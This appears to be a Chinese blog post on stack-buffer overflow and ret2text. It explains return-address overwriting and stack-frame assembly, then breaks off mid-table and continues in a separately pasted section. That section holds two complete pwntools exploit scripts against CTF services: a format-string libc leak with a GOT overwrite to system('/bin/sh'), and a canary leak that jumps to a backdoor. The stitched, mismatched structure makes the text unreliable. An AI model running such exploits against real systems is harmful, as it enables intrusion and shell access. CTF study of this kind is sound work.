栈溢出总结+ret2text

本文深入探讨了栈溢出的原理,强调了栈中保存的函数返回地址的重要性。通过篡改这个地址,可以实现代码执行的跳转。文章还介绍了函数调用栈的结构和主要过程,并简要提及了保护方式及如何绕过这些保护。

1、堆栈溢出原理

通俗的讲,栈溢出的原理就是不顾堆栈中分配的局部数据块大小,向该数据块写入了过多的数据,导致数据越界,结果覆盖了老的堆栈数据。

其中,最重要的一点: 栈中保存了函数调用时的返回地址。
缓冲区溢出的目的就是要将栈中保存的返回地址篡改成溢出的数据,这样就间接修改了函数的返回地址,当函数返回时,就能跳转到预设的地址中,执行植入的代码。

2、函数调用栈的结构和主要过程
图示:
在这里插入图片描述
文字说明:
调用及释放
汇编代码

push 参数 3               #参数由右向左入栈
push 参数 2
push 参数 1
call 函数地址             #push当前指令位置,跳转到所调用函数的入口地址
push ebp                 #保存旧栈帧的底部
mov ebp,esp              #设置新栈帧底部
sub esp ,xxx             #设置新栈帧顶部

栈帧调整:
保存当前栈帧的状态值,为了后面恢复本栈帧时使用(EBP入栈);
将当前的栈帧切换到新栈帧(ESP值装入EBP,更新栈帧底部);
给新栈帧分配空间(ESP减去所需要空间的大小,抬高栈顶)。

3、保护方式及其绕过方法:

保护 绕过
数据执行保护(NX/DEP) ROP
### fmt(格式化字符串漏洞)技术介绍及应用 #### 技术介绍 格式化字符串漏洞(fmt)是一种常见的安全漏洞,通常出现在程序使用格式化字符串函数(如`printf`、`sprintf`等)时,没有正确处理用户输入的格式化字符串参数。攻击者可以利用这个漏洞来泄露程序的敏感信息,如内存地址、栈内容等,还可以修改程序的内存数据,从而控制程序的执行流程。 #### 应用示例 在`fmt漏洞 泄露libc → 打got表`的示例中,利用格式化字符串漏洞泄露了`printf`函数的真实地址,进而计算出`libc`库的基地址,然后通过`fmtstr_payload`函数构造新的格式化字符串,将`printf`的`GOT`表项修改为`system`函数的地址,最后传递`/bin/sh`字符串来获取shell。以下是示例代码片段: ```python from pwn import * from LibcSearcher import * url, port = "node4.buuoj.cn", 27466 filename = "./wdb_2018_2nd_easyfmt" elf = ELF(filename) libc = ELF("./libc_x86-2.23.so") context(arch="i386", os="linux") local = 0 if local: context.log_level="debug" io = process(filename) else: io = remote(url, port) def pwn(): printf_got = elf.got['printf'] payload = p32(printf_got) + b'%6$s' io.sendlineafter("repeater?\n", payload) io.recv(4) printf_addr = u32(io.recv(4)) libc_base = printf_addr - libc.sym['printf'] system_addr = libc_base + libc.sym['system'] log.info("system address: %#x" % system_addr) payload = fmtstr_payload(6, {printf_got:system_addr}) io.sendline(payload) io.sendline(b"/bin/sh\x00") if __name__ == "__main__": pwn() io.interactive() ``` ### ret2text技术介绍及应用 #### 技术介绍 ret2text是一种缓冲区溢出攻击技术,其核心思想是利用缓冲区溢出漏洞,覆盖程序的返回地址,使程序跳转到程序自身已有的代码段(通常是包含有用功能的代码,如`system("/bin/sh")`)执行,从而获取系统权限。这种技术不需要额外的库文件,直接利用程序本身的代码逻辑。 #### 应用示例 在`axb_2019_fmt64`示例中,虽然主要是格式化字符串漏洞利用,但也有部分思想与ret2text类似。通过泄露`elf`基地址和`canary`值,然后构造包含正确`canary`和目标函数地址(`backdoor`)的有效负载,让程序跳转到`backdoor`函数执行。以下是示例代码片段: ```python from pwn import * from ctypes import* p = remote('182.92.237.102', 10011) FILENAME = '../pwn' # p = process(FILENAME) # elf = ELF(FILENAME) # libc = ELF('../libc.so.6') # gdb.attach(p, 'b* $rebase(0x133F)') payload = b'flagis\x00' + b'%17$p--%15$p' p.recvuntil(b'>>') p.sendline(payload) p.recvuntil(b'0x') elf_add = int(p.recv(6*2), 16) elfbase = elf_add - 0x1520 success('elfbase '+hex(elfbase)) p.recvuntil(b'0x') canary = int(p.recv(8*2), 16) success('canary '+hex(canary)) backdoor = elfbase + 0x1291 payload = b'exit'.ljust(56, b'\x00') + p64(canary) + p64(0) + p64(backdoor) p.recvuntil(b'>>') p.sendline(payload) p.interactive() ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值